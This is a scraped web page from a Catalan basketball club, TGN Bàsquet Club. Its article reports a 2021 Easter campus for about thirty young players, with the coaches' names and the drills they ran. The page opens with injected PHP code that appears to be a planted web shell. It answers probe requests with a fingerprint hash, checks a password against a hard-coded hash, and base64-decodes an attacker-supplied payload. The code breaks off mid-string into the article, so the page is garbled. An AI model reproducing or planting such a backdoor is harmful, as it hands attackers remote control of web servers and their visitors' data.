function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Comença el Campus de Setmana Santa amb una trentena de participants - Tgn Bàsquet Club -

Comença el Campus de Setmana Santa amb una trentena de participants

By
Updated: març 29, 2021

Una trentena de jugadors i jugadores de bàsquet des de P4 i fins a 6è han iniciat avui el Campus de Setmana Santa del TGN Bàsquet que es perllongarà fins al dia 1 d’abril. El Campus és una novetat en el club lila perquè habitualment en aquestes dates es celebra el Torneig de Cambrils, que enguany, tal com va succeir l’any passat, s’ha hagut de cancel·lar per culpa de la Covid-19.

Així, els participants en el Campus s’han dividit en tres grups dirigits per tres entrenadors del club, Mari Carme Martí, Ignasi Icart i Marce Antulín. Els participants de P4 han treballat el bot, mentre que els benjamins han entrenat passades i els alevins tècnica individual i uns contra un, així com entrenament de tir. En tots els casos, després de la pausa de l’esmorzar es fan jocs i, sobretot, competició per tal de practicar en situacions reals allò que s’ha entrenat en la primera franja horària.

GALERIA DE FOTOGRAFIES

 

 

Un Comentari

Deixa un comentari

L'adreça electrònica no es publicarà. Els camps necessaris estan marcats amb *